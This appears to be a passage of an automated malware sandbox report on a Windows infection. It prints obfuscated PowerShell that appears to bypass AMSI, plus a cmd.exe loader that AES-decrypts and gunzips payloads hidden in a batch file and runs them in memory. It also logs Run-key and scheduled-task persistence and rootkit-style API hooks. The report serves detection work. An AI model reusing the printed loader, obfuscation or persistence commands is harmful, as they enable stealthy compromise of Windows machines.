Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($WzFkwARTzpFLOf,$PEmsRMlCSlPDgPcGUWk).Invoke('a'+'m'+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$BtHEHTUmMhFSXEmPh=$YLRtgUHBybAeSz.Invoke($Null,@([O
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](114)+''+[Char](98)+'x-s'+'t'+
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''
Suspicious command line found
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\conhost.exe Code function: 20_2_000001B444901E3C LoadLibraryA,GetProcAddress,SleepEx, 20_2_000001B444901E3C
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\conhost.exe Code function: 20_3_000001B4448BA7DD push rcx; retf 003Fh 20_3_000001B4448BA7DE
Source: C:\Windows\System32\conhost.exe Code function: 39_3_000001FE3A95A7DD push rcx; retf 003Fh 39_3_000001FE3A95A7DE
Source: C:\Windows\System32\dllhost.exe Code function: 40_3_000001C03F6FA7DD push rcx; retf 003Fh 40_3_000001C03F6FA7DE
Source: C:\Windows\System32\winlogon.exe Code function: 41_3_000002E99173A7DD push rcx; retf 003Fh 41_3_000002E99173A7DE
Source: C:\Windows\System32\lsass.exe Code function: 42_3_00000213BDCCA7DD push rcx; retf 003Fh 42_3_00000213BDCCA7DE
Source: C:\Windows\System32\svchost.exe Code function: 43_3_00000158709BA7DD push rcx; retf 003Fh 43_3_00000158709BA7DE
Source: C:\Windows\System32\dwm.exe Code function: 44_3_0000026DB164A7DD push rcx; retf 003Fh 44_3_0000026DB164A7DE
Source: C:\Windows\System32\dwm.exe Code function: 44_3_0000026DB161A7DD push rcx; retf 003Fh 44_3_0000026DB161A7DE
Source: C:\Windows\System32\svchost.exe Code function: 45_3_000002A3EFFDA7DD push rcx; retf 003Fh 45_3_000002A3EFFDA7DE

Boot Survival
barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Creates autostart registry keys with suspicious names
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Creates job files (autostart)
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\$rbx-1ktMxXBv
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Hooks files or directories query functions (used to hide files and directories)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Hooks processes query functions (used to hide processes)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Stores large binary data to the registry
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
